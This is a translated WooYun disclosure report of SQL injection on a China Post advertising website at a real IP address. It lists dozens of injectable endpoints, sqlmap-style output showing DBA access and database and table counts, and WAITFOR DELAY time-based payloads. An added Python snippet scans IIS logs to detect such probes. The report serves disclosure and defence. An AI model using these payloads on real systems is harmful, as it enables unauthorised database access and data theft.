Vulnerability summary

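Bug ID: wooyun-2014-050866

Title: China Post Advertising Network: a hidden SQL injection with DBA privileges (leaks sensitive administrator information and mail information)

Vendor: China Post Group Corporation, Information Technology Bureau

Author: HackBraid

Submitted: 2014-02-13 17:16

Fixed: 2014-03-30 17:16

Disclosed: 2014-03-30 17:16

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]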


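Vulnerability details

Disclosure status:

2014-02-13: Details reported to the vendor, awaiting vendor handling
2014-02-14: Vendor confirmed; details disclosed to the vendor only
2014-02-24: Details disclosed to core white hats and experts in related fields
2014-03-06: Details disclosed to regular white hats
2014-03-16: Details disclosed to intern white hats
2014-03-30: Details disclosed to the public

Brief description:

Hidden high-risk SQL injection: more than 2,000 users, 250,000+ login records of a certain system's administrators, and 100,000+ mail records.

Detailed description:

Site:
http://124.207.29.201/ China Post Advertising Network
GET injection point:
http://124.207.29.201/CheckUserName.asp?username=
POST injection points (note the title field):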
1.http://124.207.29.201/zygg_fb/ggzx/chaxun_guandian.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
2.http://124.207.29.201/zygg_fb/zcfg/chaxun_yzxgyw.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
3.http://124.207.29.201/zygg_fb/zcfg/chaxun_xgzs.asp submit=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
4.http://124.207.29.201/zygg_fb/wzcp/wzcp_chaxun.asp submit=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
5.http://124.207.29.201/zygg_fb/zcfg/chaxun_sbf.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
6.http://124.207.29.201/zygg_fb/zcfg/chaxun_yzf.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
7.http://124.207.29.201/zygg_fb/zcfg/chaxun_fagui.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
8.http://124.207.29.201/zygg_fb/zcfg/chaxun_zzf.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
9.http://124.207.29.201/zygg_fb/zcfg/chaxun_query_res.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
10.http://124.207.29.201/zygg_fb/zcfg/chaxun_zlf.asp id=88952634&title=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%D8%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD
11.http://124.207.29.201/zygg_fb/ggzx/chaxun_hangye.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
12.http://124.207.29.201/zygg_fb/ggzx/chaxun_zhishi.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
13.http://124.207.29.201/zygg_fb/ggzx/chaxun_diaoyan.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
14.http://124.207.29.201/zygg_fb/ggzx/chaxun_shiye.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
15.http://124.207.29.201/zygg_fb/ggzx/chaxun_fenxi.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
16.http://124.207.29.201/zygg_fb/ggzx/chaxun_guandian.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
17.http://124.207.29.201/zygg_fb/zcfg/chaxun_yzxgyw.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
18.http://124.207.29.201/zygg_fb/zcfg/chaxun_xgzs.asp submit=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
19.http://124.207.29.201/zygg_fb/zcfg/chaxun_zd.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
20.http://124.207.29.201/zygg_fb/zcfg/chaxun_mt.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
21.http://124.207.29.201/zygg_fb/zcfg/chaxun_yl.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
22.http://124.207.29.201/zygg_fb/zcfg/chaxun_ys.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
23.http://124.207.29.201/zygg_fb/zcfg/chaxun_qt.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
24.http://124.207.29.201/zygg_fb/zuoping/chaxun_2004y1.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
25.http://124.207.29.201/zygg_fb/zuoping/chaxun_2004j1.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
26.http://124.207.29.201/zygg_fb/zuoping/chaxun_2004t1.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
27.http://124.207.29.201/zygg_fb/huwaimeiti/search_res.asp Submit=%EF%BF%BD%EF%BF%BD%D1%AF&province=0&Type=0&Price=0&InfoTime=0&gjz=88952634
28.http://124.207.29.201/zygg_fb/zhaopin/search_res.asp submit2=%EF%BF%BD%EF%BF%BD%20%D1%AF&SType=0&select2=0&select3=0&select=0&keyword=%EF%BF%BD%D8%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD
The admin back-end address is too simple:
http://124.207.29.201/manage/ with no CAPTCHA!

Proof of vulnerability:

GET injection point:
http://124.207.29.201/CheckUserName.asp?username=
DBA account:

web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
current user is DBA: True


Database list:

available databases [10]:
[*] jishuqi
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pian_gx_sql
[*] pubs
[*] tempdb
[*] zygg_fb
[*] zygg_fb0402


The database zygg_fb contains 2603 account records:

Database: zygg_fb
+-------------+---------+
| Table | Entries |
+-------------+---------+
| dbo.z_users | 2603 |
+-------------+---------+


The database pian_gx_sql leaks 250,000+ administrator login records:

Database: pian_gx_sql
+--------------+---------+
| Table | Entries |
+--------------+---------+
| dbo.Syslogin | 252400 |
+--------------+---------+


There are also 100,000+ sensitive mail records:

[Screenshot: y.jpg]


POST injection:

Place: POST
Parameter: select2
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: submit2=%EF%BF%BD%EF%BF%BD %D1%AF&SType=0&select2=0'; WAITFOR DELAY '0:0:5'--&select3=0&select=0&keyword=%EF%BF%BD%D8%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: submit2=%EF%BF%BD%EF%BF%BD %D1%AF&SType=0&select2=0' WAITFOR DELAY '0:0:5'--&select3=0&select=0&keyword=%EF%BF%BD%D8%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
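
A detection sketch for the time-based payloads shown above, added here as an example and not part of the original report: it scans IIS W3C logs for WAITFOR DELAY in the query string and uses time-taken to tell whether the delay actually ran on the server. The log lines, client addresses, and the /search.asp path are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log lines (not from the report); client IPs are
# documentation addresses and /search.asp is a hypothetical path.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status time-taken
2014-02-13 09:01:02 198.51.100.7 GET /CheckUserName.asp username=alice 200 46
2014-02-13 09:01:09 198.51.100.7 GET /CheckUserName.asp username=a%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27-- 200 5093
2014-02-13 09:02:30 203.0.113.9 GET /CheckUserName.asp username=o%27brien 200 51
2014-02-13 09:03:11 203.0.113.9 GET /news.asp id=12 200 5400
2014-02-13 09:04:00 198.51.100.7 GET /search.asp q=x%27+WAITFOR+DELAY+%270%3A0%3A5%27-- 200 38
"""

# WAITFOR DELAY 'h:m:s' as it appears in the time-based payloads quoted above.
WAITFOR = re.compile(r"waitfor\s+delay\s+'(\d+):(\d+):(\d+)", re.I)

def parse_w3c(text):
    """Yield one dict per request, using the #Fields directive for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))

def find_time_based_probes(text, slack_ms=500):
    """Return requests whose query holds WAITFOR DELAY, noting if the delay ran."""
    hits = []
    for row in parse_w3c(text):
        query = unquote_plus(row.get("cs-uri-query", ""))
        m = WAITFOR.search(query)
        if not m:
            continue
        h, mi, s = (int(g) for g in m.groups())
        delay_ms = ((h * 60 + mi) * 60 + s) * 1000
        taken = int(row.get("time-taken", "0"))
        hits.append({
            "client": row["c-ip"],
            "uri": row["cs-uri-stem"],
            "delay_ms": delay_ms,
            # A response time at or near the requested delay means the statement
            # executed on the server, i.e. the parameter is injectable.
            "executed": delay_ms > 0 and taken >= delay_ms - slack_ms,
        })
    return hits

if __name__ == "__main__":
    for hit in find_time_based_probes(SAMPLE_LOG):
        print(hit)
```

IIS W3C logs do not record POST bodies, so the POST injection points listed in the report would only be visible to this check with request-body logging, for example at a WAF or reverse proxy.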


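Fix:

No damage was done; I only counted the amount of data.

Copyright notice: when reposting, credit the source HackBraid@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2014-02-14 15:05

Vendor reply:

Thank you, we will contact the responsible person as soon as possible to handle this.

Latest status:

None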